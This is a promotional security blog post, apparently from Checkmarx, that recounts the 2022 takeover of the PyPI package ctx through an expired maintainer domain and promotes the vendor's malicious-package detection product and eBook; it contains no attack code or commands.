Security incidents and malware attacks hit the headlines so often that they almost feel like background noise. Analysts found that 78% of surveyed organizations reported a breach in the previous year. Attackers are getting more inventive and opportunistic with open-source, AI-powered software. As one recent incident shows, even small oversights can have big consequences.
In May 2022, a security researcher executed a stunt straight out of Blackhat, the Chris Hemsworth cyber-thriller where hackers quietly infiltrate global systems. For just $5, he bought an expired domain – one that had once belonged to the maintainer of a long-abandoned Python package called ctx. With that, he was able to reset the maintainer’s password on PyPI, the Python Package Index, and upload a new version of the package that silently exfiltrated AWS credentials from any system that installed it.
The implications were staggering. Anyone who downloaded ctx could unknowingly give attackers access to AWS environments, which power roughly 31% of global cloud infrastructure and about one-third of all existing websites.
No brute force. No zero-day exploit. Just an expired domain, a forgotten package, and a few lines of malicious code—enough to launch what’s now known as a “malicious package” attack.
The person later insisted it was all for “research,” but the episode became a wake-up call for the open-source community. We cannot forget that in an interconnected software world, trust can be breached for the price of a cup of coffee.
Packages are Proliferating
Malicious packages often begin as trusted, open-source components – created and shared by well-intentioned developers – but twisted into nefarious tools that can steal credentials, open backdoors, mine cryptocurrency, inject ransomware, or destabilize entire platforms. Some even masquerade as legitimate updates or forks of popular libraries, making them dangerously hard to detect.
Now, with AI generating code at unprecedented speed, malicious packages are multiplying faster than ever. According to Sonatype’s Q2 2025 Open-Source Malware Index, they surged 188% year over year – not a blip, but a potential tidal wave.
Let’s Take a Deep Dive…
That’s why we at Checkmarx are taking a proactive approach. In our new research eBook, we investigate and explain how these packages evolve, spread, and infiltrate the software supply chain. We give organizations insight into identifying, deflecting, and neutralizing them before they strike.
We’re not just studying this phenomenon – we’re tracking it in real time. Our research teams collect and analyze suspicious packages in isolated, sandboxed “detonation chambers,” environments completely detached from production networks. There, we safely execute and observe malicious behaviors to understand how they operate and what they target to stay one step ahead of their evolution.
So far, we’ve trapped over 410,000 known malicious or suspicious packages – each tagged, analyzed, and added to our database. This intelligence directly powers Checkmarx One, one of the few AppSec platforms capable of blocking malicious packages before installation.
Open-source threats move fast, so your prevention has to move faster. That’s why Checkmarx One provides security that moves at the speed of modern development, integrating Software Composition Analysis (SCA), scanning, and proactive vulnerability detection directly into developer workflows. Vulnerabilities are detected before they become problems, right on the developer’s desktop.
Full-Circle: From $5 Hack to a Safer Future
That $5 hack from three years ago was a warning shot – a glimpse of how automation, open-source sprawl, and AI-generated code are reshaping the threat landscape at exponential speed.
Download the full eBook to learn more about malicious packages and how to spot the next wave before it hits. Stay vigilant and know that Checkmarx is here to help you stay one step ahead – through Cybersecurity Month and into the ever-accelerating future of AI-driven software development.